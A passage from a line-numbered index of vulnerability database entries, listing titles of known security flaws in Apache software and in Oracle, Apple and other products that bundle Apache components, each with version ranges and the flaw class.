7748| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
7749| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
7750| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
7751| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
7752| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
7753| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
7754| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
7755| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
7756| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
7757| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
7758| [108782] Apache Xerces2 XML Service denial of service
7759| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
7760| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
7761| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
7762| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
7763| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
7764| [108629] Apache OFBiz up to 10.04.01 privilege escalation
7765| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
7766| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
7767| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
7768| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
7769| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
7770| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
7771| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
7772| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
7773| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
7774| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
7775| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
7776| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
7777| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
7778| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
7779| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
7780| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
7781| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
7782| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
7783| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
7784| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
7785| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
7786| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
7787| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
7788| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
7789| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
7790| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
7791| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
7792| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
7793| [107639] Apache NiFi 1.4.0 XML External Entity
7794| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
7795| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
7796| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
7797| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
7798| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
7799| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
7800| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
7801| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
7802| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
7803| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
7804| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
7805| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
7806| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
7807| [107197] Apache Xerces Jelly Parser XML File XML External Entity
7808| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
7809| [107084] Apache Struts up to 2.3.19 cross site scripting
7810| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
7811| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
7812| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
7813| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
7814| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
7815| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
7816| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
7817| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
7818| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
7819| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
7820| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
7821| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
7822| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
7823| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
7824| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
7825| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
7826| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
7827| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
7828| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
7829| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
7830| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
7831| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
7832| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
7833| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
7834| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
7835| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
7836| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
7837| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
7838| [105878] Apache Struts up to 2.3.24.0 privilege escalation
7839| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
7840| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
7841| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
7842| [105643] Apache Pony Mail up to 0.8b weak authentication
7843| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
7844| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
7845| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
7846| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
7847| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
7848| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
7849| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
7850| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
7851| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
7852| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
7853| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
7854| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
7855| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
7856| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
7857| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
7858| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
7859| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
7860| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
7861| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
7862| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
7863| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
7864| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
7865| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
7866| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
7867| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
7868| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
7869| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
7870| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
7871| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
7872| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
7873| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
7874| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
7875| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
7876| [103690] Apache OpenMeetings 1.0.0 sql injection
7877| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
7878| [103688] Apache OpenMeetings 1.0.0 weak encryption
7879| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
7880| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
7881| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
7882| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
7883| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
7884| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
7885| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
7886| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
7887| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
7888| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
7889| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
7890| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
7891| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
7892| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
7893| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
7894| [103352] Apache Solr Node weak authentication
7895| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
7896| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
7897| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
7898| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
7899| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
7900| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
7901| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
7902| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
7903| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
7904| [102536] Apache Ranger up to 0.6 Stored cross site scripting
7905| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
7906| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
7907| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
7908| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
7909| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
7910| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
7911| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
7912| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
7913| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
7914| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
7915| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
7916| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
7917| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
7918| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
7919| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
7920| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
7921| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
7922| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
7923| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
7924| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
7925| [99937] Apache Batik up to 1.8 privilege escalation
7926| [99936] Apache FOP up to 2.1 privilege escalation
7927| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
7928| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
7929| [99930] Apache Traffic Server up to 6.2.0 denial of service
7930| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
7931| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
7932| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
7933| [117569] Apache Hadoop up to 2.7.3 privilege escalation
7934| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
7935| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
7936| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
7937| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
7938| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
7939| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
7940| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
7941| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
7942| [99014] Apache Camel Jackson/JacksonXML privilege escalation
7943| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
7944| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
7945| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
7946| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
7947| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
7948| [98605] Apple macOS up to 10.12.3 Apache denial of service
7949| [98604] Apple macOS up to 10.12.3 Apache denial of service
7950| [98603] Apple macOS up to 10.12.3 Apache denial of service
7951| [98602] Apple macOS up to 10.12.3 Apache denial of service
7952| [98601] Apple macOS up to 10.12.3 Apache denial of service
7953| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
7954| [98405] Apache Hadoop up to 0.23.10 privilege escalation
7955| [98199] Apache Camel Validation XML External Entity
7956| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
7957| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
7958| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
7959| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
7960| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
7961| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
7962| [97081] Apache Tomcat HTTPS Request denial of service
7963| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
7964| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
7965| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
7966| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
7967| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
7968| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
7969| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
7970| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
7971| [95311] Apache Storm UI Daemon privilege escalation
7972| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
7973| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
7974| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
7975| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
7976| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
7977| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
7978| [94540] Apache Tika 1.9 tika-server File information disclosure
7979| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
7980| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
7981| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
7982| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
7983| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
7984| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
7985| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
7986| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
7987| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
7988| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
7989| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
7990| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
7991| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
7992| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
7993| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
7994| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
7995| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
7996| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
7997| [93532] Apache Commons Collections Library Java privilege escalation
7998| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
7999| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
8000| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
8001| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
8002| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
8003| [93098] Apache Commons FileUpload privilege escalation
8004| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
8005| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
8006| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
8007| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
8008| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
8009| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
8010| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
8011| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
8012| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
8013| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
8014| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
8015| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
8016| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
8017| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
8018| [92549] Apache Tomcat on Red Hat privilege escalation
8019| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
8020| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
8021| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
8022| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
8023| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
8024| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
8025| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
8026| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
8027| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
8028| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
8029| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
8030| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
8031| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
8032| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
8033| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
8034| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
8035| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
8036| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
8037| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
8038| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
8039| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
8040| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
8041| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
8042| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
8043| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
8044| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
8045| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
8046| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
8047| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
8048| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
8049| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
8050| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
8051| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
8052| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
8053| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
8054| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
8055| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
8056| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
8057| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
8058| [90263] Apache Archiva Header denial of service
8059| [90262] Apache Archiva Deserialize privilege escalation
8060| [90261] Apache Archiva XML DTD Connection privilege escalation
8061| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
8062| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
8063| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
8064| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
8065| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
8066| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
8067| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
8068| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
8069| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
8070| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
8071| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
8072| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
8073| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
8074| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
8075| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
8076| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
8077| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
8078| [87765] Apache James Server 2.3.2 Command privilege escalation
8079| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
8080| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
8081| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
8082| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
8083| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
8084| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
8085| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
8086| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
8087| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
8088| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
8089| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
8090| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
8091| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
8092| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
8093| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
8094| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
8095| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
8096| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
8097| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
8098| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
8099| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
8100| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
